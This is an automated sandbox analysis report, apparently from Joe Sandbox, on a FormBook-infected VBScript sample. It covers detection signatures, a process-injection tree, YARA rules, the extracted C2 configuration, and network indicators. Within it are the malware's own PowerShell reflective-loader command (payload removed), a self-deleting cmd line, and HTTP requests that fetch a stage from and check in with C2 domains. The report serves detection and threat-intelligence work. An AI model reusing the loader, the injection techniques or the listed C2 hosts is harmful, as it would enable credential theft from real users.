Windows Analysis Report
Scan_Doc.vbs

Overview

General Information

Sample Name: Scan_Doc.vbs
Analysis ID: 1272266
MD5: eca38e49a376a162a21d257363a2263e
SHA1: 80a99c2a933d454b3654d1a7bca7993c1b1355fb
SHA256: a3fd50cd54fa36cec2ee064e52c91d2106701374fcd3e0ad1e22cbf17479ca71
Tags: vbs
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5700 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('[Base64 data removed]');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.onis4*?*?#:?v4*?*?#:?k!}( }il!}( }.8*??(ws8*??(rf4*?*?#:?4*?*?#:??? }??+?p ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup')) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchost.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5912 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
            • cmd.exe (PID: 5936 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.krmq9w.cfd/g94s/"], "decoy": ["electorhome.com", "produtosmult.com", "csfelier.com", "wecarecats.com", "ohayouai.com", "rueduvan.cfd", "jay2oh.cfd", "hyperpigmentation-91528.bond", "tycoorabe.best", "trinityxtore.com", "itko9j.cfd", "wumpininews.net", "hyundaievtrucks.com", "mensaoxyz.xyz", "youvebeenjuaned.com", "apinspect.net", "skonehenge.com", "93txm.live", "lajzznhk.cfd", "gprcdgbp.cfd", "hawckxvk.cfd", "vrescjta.xyz", "brezop.xyz", "xnmshx.cfd", "rduyisqy.cfd", "dhaozermbloscvur.com", "baroevent.com", "iamthe.app", "yusqfwfl.cfd", "eeqihhgoqi.com", "suitahoukagodayjiko.com", "amyloujennings.com", "kohtao.online", "qjcl6y.com", "chargezready.com", "lojq5vh.buzz", "yufqjkcd.cfd", "ola1919.com", "klikjackpot4.store", "neurivamind.com", "yprblqkk.cfd", "sapienyoga.com", "justinwdong.com", "homesfefe.online", "tinnitustreatment.xyz", "styledinfaith.com", "ngl1aw.cfd", "crabsaw.store", "yl0004.xyz", "qsmdrkjw.cfd", "124jm.com", "tbltechnerds.xyz", "drekrowr.cfd", "ogtvmiyc.cfd", "beijingchineserestaurantil.com", "cpbooster.cyou", "drivercode.work", "rixiojjl.cfd", "latamgradoenenfermeria.com", "beyonddocs.site", "eui6i3.cfd", "6neizr.cfd", "chuji-7.xyz", "6srmo6sg.top"]}
Source | Rule | Description | Author | Strings
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      3.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      3.2.svchost.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      3.2.svchost.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          No Sigma rule has matched
          Timestamp: 07/13/23-09:50:17.734032
          Source IP: 192.168.2.3
          Destination IP: 76.223.105.230
          SID: 2031412
          Source Port: 49701
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook
          Source: Yara match File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: cmmon32.pdb source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: E:\Folders\Crypter bypass all and vbs e js 13-16-2023 original\Crypter bypass all and vbs e js\Crypter bypass all and vbs e js\Rump Offline new modifiqued\Rump Offline new\bin\Release\obfuscated\Fiber.pdb source: powershell.exe, 00000001.00000002.392901894.00000210918A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.398867984.00000210A9B40000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: svchost.exe, 00000003.00000003.434203339.0000000003417000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434765760.0000000003870000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901605087.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.391679836.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.434919800.0000000003B1F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.392837490.0000000003800000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000007.00000003.436155805.0000000004398000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000003.434602736.00000000041F8000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.426705932.00007FFC1B351000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: svchost.pdb source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: cmmon32.exe, 00000007.00000002.902659095.0000000004A5F000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000007.00000002.901229697.00000000006B4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop ebx 3_2_00407B1B
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop ebx 7_2_001A7B1B

          Networking

          Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80
          Source: C:\Windows\explorer.exe Network Connect: 76.223.105.230 80
          Source: C:\Windows\explorer.exe Network Connect: 99.83.196.71 80
          Source: C:\Windows\explorer.exe Domain query: www.baroevent.com
          Source: C:\Windows\explorer.exe Domain query: www.apinspect.net
          Source: C:\Windows\explorer.exe Network Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exe Network Connect: 209.142.66.216 80
          Source: C:\Windows\explorer.exe Domain query: www.electorhome.com
          Source: C:\Windows\explorer.exe Domain query: www.krmq9w.cfd
          Source: C:\Windows\explorer.exe Domain query: www.qsmdrkjw.cfd
          Source: C:\Windows\explorer.exe Domain query: www.rixiojjl.cfd
          Source: C:\Windows\explorer.exe Domain query: www.lajzznhk.cfd
          Source: C:\Windows\explorer.exe Domain query: www.hyperpigmentation-91528.bond
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49701 -> 76.223.105.230:80
          Source: Yara match File source: 1.2.powershell.exe.210919328c8.0.raw.unpack, type: UNPACKEDPE
          Source: Malware configuration extractor URLs: www.krmq9w.cfd/g94s/
          Source: Joe Sandbox View ASN Name: INNSYSCA INNSYSCA
          Source: global traffic HTTP traffic detected: GET /v/sino.txt HTTP/1.1 Host: freswe.click Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd HTTP/1.1 Host: www.apinspect.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe HTTP/1.1 Host: www.baroevent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ HTTP/1.1 Host: www.hyperpigmentation-91528.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd HTTP/1.1 Host: www.qsmdrkjw.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy HTTP/1.1 Host: www.lajzznhk.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 185.53.179.91 185.53.179.91
          Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 13 Jul 2023 07:51:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krmq9w.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd/g94s/www.latamgradoenenfermeria.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com/g94s/www.styledinfaith.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.comReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz/g94s/www.justinwdong.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzzReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd/g94s/www.lajzznhk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd/g94s/www.krmq9w.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfdReferer:
